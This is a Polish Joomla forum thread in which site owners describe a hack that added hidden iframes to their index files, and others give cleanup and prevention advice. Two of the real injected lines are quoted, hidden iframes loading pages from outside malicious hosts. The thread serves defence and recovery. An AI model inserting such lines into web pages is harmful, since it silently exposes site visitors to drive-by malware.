Witam,
korzystam z Joomla 1.5.8 i w dniu dzisiejszym o 15.00 wszystkie pliki index oraz home (php, html) na serwerze dostały dopisek:

<?php echo '<div style="visibility:hidden"><iframe src="http://directlinkq.cn/in.cgi?27" width=100 height=80></iframe></div>'; ?>
Niezwłocznie wgrałem kopie wszystkich plików bez tych dopisków i zmieniłem hasła.
Czy jest jakiś sposób na uniknięcie takich wypadków w przyszłości? Chmody miałem ustawione wszędzie zgodnie z zaleceniami.
Jeżeli ktoś ma jakieś doświadczenia w podobnej sprawie, to bardzo proszę o pomoc.

poczytaj (http://www.joomlapl.com/content/view/238/26/) :)

Czytałem już to wcześniej :)
A tak na poważnie, to jest jakiś złoty środek na tego typu zdarzenia? Wszystkie prawa dostępu mam ustawione na 755 foldery i 644 pliki.

Mnie także to spotkało 22.12 ale na Joomla 1,015, dopisek do wszystkich plików index
<iframe src="http://thedeadpit.com/?click=406546" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
Hasła mam dość wymyślne, chmody także solidne, a tu taka nimiła niespodzianka. Jak się przed tym paskudztwem można jeszcze zabezpieczyć ?

Pamietajcie podstawowa rzecz - chocby najnowsza Joomla - to wlamy najczesciej sa przez STARE dodatkowe skladniki - komponenty itp.

Ja się czuję bezsilny, bo korzystam z najnowszej wersji Joomla 1.5.8, wszystkie komponenty są również uaktualnione do aktualnych edycji. Więc nie mam czego uaktualnić na chwilę obecną.
Chmody ustawione według zaleceń, hasła pozmieniałem po ataku, przywróciłem na serwer właściwe pliki index. Na razie jest spokój, ale tylko czekać na powtórkę z rozrywki.
Najgorsze, że nigdzie nie można znaleźć jakiejś konkretnej metody co dokładnie można zrobić, aby zapobiec tym wkurzającym działaniom. Przeszukałem zagraniczne fota i nic konkretnego.

dobra - a co zrobić jeśli już taki złośliwiec się pokarze w plikach a nie ma możliwości skorzystania z Backupu?

U mnie sprawa wygląda tak, ze iframe (linku nie podaje, bo jeszcze ktoś kliknie) Pojawia sie na każdej podstronie gdzie mają się pojawić artykuły.

na podstronei z Forum, czy formularzem kontaktowym nie ma.
Problem w tym, ze nei wiem gdzie szukac tego fragmentu kodu, bu go poprostu skasowac... :)

Czy ktloś ma jakiś pomysl?

Wtedy pozostaje zastosować Windows Commandera i wszystkie zmodyfikowane przez trojana pliki trzeba poprawić i wyciąć iframe ręcznie. Sam to przerobiłem. Głównie są zmodyfikowane pliki index. szablonów, componentów, modułów

Zapomniałeś dodać, że tego Windows Commandera trzeba najpierw odwirusować!

Tak oczywiście odwirusować i to odpalając program antywirusowy w trybie awaryjnym systemu bo niektóre klony tego trojana usuwane bezprośrednio w trybie normalnym pojawiają się ponownie i trzeba ponownie rzeźbić pliki. Poza tym po usunięciu trojana, koniecznie zmienić hasło do FTP i Joomla.

hasła zmieniłem... skaner MKS nie wykryl u mnie na kompie żadnych wirów...
index komponentów, modułow, templatek... nie dobzr e- dużo grzebania... zastanawiam sie wiec nad: http://forum.joomla.pl/showthread.php?t=28784

Pamiętaj, że iframe atakuje tylko pliki Joomla na FTP-ie, jeśli masz gdzieś kopię Joomli w wersji którą masz na serwerze to poprostu nadgraj pliki bez katalogu installation. Jeśli nie masz to pobierz pliki ze strony z www.joomla.pl (http://www.joomla.pl). Nie musisz ruszać bazy w phpmyadminie bo iframe nie atakuje bazy ani artykułów w niej zawartych, wystarczy nadgrać pliki, ewentualnie poprawić pliki komponentów wycinając z nich iframe, które były doinstalowane do standardowej wersji Joomla.

... poprostu nadgraj pliki bez katalogu installation. .
1. Czy na bank nic się nie rozjedzie?
2. Które pliki? Wszytkie jak leci bez selekcji?

Oczywiście zrób najpierw koniecznie kopię tych zakażonych plików to podstawowa zasada !!! Przeskanuj po ściągnięciu na dysk antywirusem koniecznie w trybie awaryjnym bo niektóre klony są niewidoczne w trybie normalnym systemu operacyjnego.
Jeśli jest standardowa instalacja Joomla bez udziwnień to musi zadziałać, przegraj wszystkie pliki Joomla oprócz katalogu installation..

Kopia tych zakażonych - rozumiem , że wszystkich - skoro nei wiem który jest zarażony...
Problem w tym,z ę trochę udziwniona.. CiviCRM+Virtuemart+Fireboard+ + +
Az się boje cokowliek napisywać...
Offtopic - czy da się skopiować zawartość fireboard tak by ją ograć do kopii Joomla, która mam zrobioną za pomocją Joomlapack?

No fakt masz trochę tego, to musisz zrobić tak, znajdź w internecie czyste paczki instalacyjne tych komponentów z tym, że najpierw skopiuj pliki Joomla potem dokładnie nadgraj pliki komponentów i pamiętaj żeby miały te same prawa (chmody) i powinno działać. Nie ruszaj bazy danych bo bazy nie narusza trojan generujący iframe.

A czy sensowna byla by świeża instalacja joomla w tej samej wersji + dogranie fireboard, civicrm itd a potem podmian bazy danych?
(ma mproblem z kopiowaniem plików w tę i z powrotem) ciągnie sie to i ciagnie...
...a Joomle zainstalowaną - (nie używaną), dzialająca mam już na serwie...

Walcze jak lew, zginę jak mucha...
Podmieniałem pliki aż sie zamotałem które są orginalne a które nie.
Czy mogę postawić Joomlę od nowa w tej samej wersji, dograc komponenty a potem podmeinic bazę danych?
Ver 1. Instaluję nową Joomlę - mam podac istniejącą bazę danych z backupu?
Ver2. Instaluję Joomle z nową czystą bazą - poźniej w configuration php zmieniam nazwę bazy?
Ver3. Instaluję swieżą joomlę, potem w myadminie podmieniam całą bazę?

Walcze jak lew, zginę jak mucha...
Podmieniałem pliki aż sie zamotałem które są orginalne a które nie.


Mam to samo, i h... mnie strzela jak wywalam tą linijkę ręcznie.
Jak masz dość skomplikowane ustawienia i dużo wgrane to najprościej to zrobić ręcznie, choć w oczach się j... będzie od robienia tej samej czynności.
Krok 1
1. Winda do trybu awaryjnego, najlepiej bez obsługi sieci
2. AviraAntyVir (usunie serwer z twojego kompa do podsłuchu haseł)
3. Potem jakimś drugim Antywirusem dla profilaktyki

Krok 2 Winda w trybie normalnym
1. Zmieniasz hasła do FTP i Admina w joomli
2. Łączysz się przez FTPa na serwer z plikami joomli
3. Ściągasz sobie katalog na dysk (katalog z całą zawartością)
4. Menu start/wyszukaj/pliki i dokumenty/zmienione od - do (data kiedy był włam)
5. Jak już wyszukało ci pliki to każdy z nich otwierasz i kasujesz tą linijkę iframe
a. większość to pliki index.html z kodem koloru , więc zamiast kasować to zaznaczyć i wkopiować czysty kod
b. jak już przerobisz wszystkie tak pliki to zamykasz okno wyszukiwania i podmieniasz cały katalog na serwerze
- jak masz w jakimś katalogu dużo plików graficznych lub innych nie tekstowych to nie ściągaj go tylko na serwerze przerób ten jeden z index na katalog
********* w ten sposób ręcznie się nie pogubisz, ani ze ścieżką, ani z modyfikacjami)

Uwaga!
Nie wiem jak reszta, ale u mnie teraz jak i rok temu we wrześniu (było to samo) winą był mój komp, nie joomla.
Wchodzisz przypadkiem na zwykła stronę, która została zhakowana, łapisze robaczka, który działa jak serwer i nasłuchuje hasełek które wpisujesz przy logowaniu, lub zczytuje je jak automatycznie logujesz się na ftp przez jakiś program, potem masz wizytę bata i zaczyna się zabawa wg kroku 1 :(
A tak przy okazji Pytanie:
Jeśli to bot w ciągu minuty przerabia tyle plików w tulu katalogach, to może ktoś dysponuje podobnym botem, który wyszuka sobie sam zmienione pliki wg daty, przeszuka ciąg znaków w zawartości i go usunie?

skrypt o którym mówisz znajduje się tutaj ---------- niestety już go nie ma ------------ niestety wylistuje tylko ostatnio modyfikowane pliki - jeśli chodzi o zmiany niestety trzeba ręcznie.

Chyba, że ktoś coś napisze - co będzie można zastosować do tego celu,

Witam koledzy.
Mam wgraną stronę z systemem Joomla od miesiąca, jest w formie testowej ale przyznam się, że jak tylko wgram strone to na drugi dzień jej nie ma, mam włamanie i dopis skrypu java lub iframe. Wczoraj zmieniłem hasła admina i skasowałem klienta FTP, ale nic nie dało, dziś ją zjadło. Uzywam komputera z systemem Mac lub komputera na z aktywnym antyvirusem, ktory nie wykrywa żadnego wirusa.

Powiedzcie mi koledzy czego używacie do wgrywania plikow TC czy FileZilla?

http://wiki.joomla.pl/Witryna_po_w%C5%82amaniu
i szerzej http://wiki.joomla.pl/Specjalna:Szukaj?search=bezpiecze%C5%84stwo&go=Przejd%C5%BA
Profilaktyka tutaj -> http://www.pomoc.joomla.pl/content/view/615/5/

Co do drugiej części tematu:
- pliki instalacyjne Joomla! rozpakowuję na serwerze w DirectAdmin
- używam też wtyczki do FF pt. FireFTP i czasem FlashFXP
- nie zapamiętuję haseł w klientach FTP

Dziękuję Ci za podpowiedź, poczytam napewno się przyda.
Mam pytanie masz gdzieś wątek jak uaktualnić system Joomla, ponieważ mam wersję 15.10 a jest 15.11. Czy mam to wgrać przez FTP czy z podsystemu Joomla jest jakiś sposób?

http://www.pomoc.joomla.pl/content/view/701/51/

Usunąłem 5 wiadomości:
Panowie! To poziom kompetencji (że się powtórzę) wyższy niż u programistów Joomla! Może by do nich napisać i podpowiedzieć, co by się Jasiu Kowalski z Pipidówki Niewielkiej dłużej nie męczył!

Witajcie - odświeżę temat - bo przygotowaliśmy dla Was narzędzie - zupełnie darmowe więc mam nadzieję, że zostanie docenione.
http://www.semarch.pl/aktualnosci_news_1012_nigdy-wiecej-zlosliwego-iframe---detektor.html

Gdyby komuś się przydało miłe słowo zawsze przyjemnie przytulimy do serca.
W skrócie - wszystko opisane u nas na stronie.
Zalecam uruchomienia zadania cron raz na 30 minut dla jednej domeny - Reszta jak w opisie;-).

W razie pytan zapraszamy do kontaktu:).

pozdrawiamy,
Semarch.pl

W razie pytan zapraszamy do kontaktu

1. A co z innymi iframe, które być może są potrzebne ?
2. Czy skrypt działa na localhost - w celu sprawdzenia jego działania ?

Skrypt ma otwarty kod. Ignoruje iframy zwiazane z fejsem.Wyjątki można już dodać samemu lub nam zgłosić - w miarę możliwości dodamy je z czasem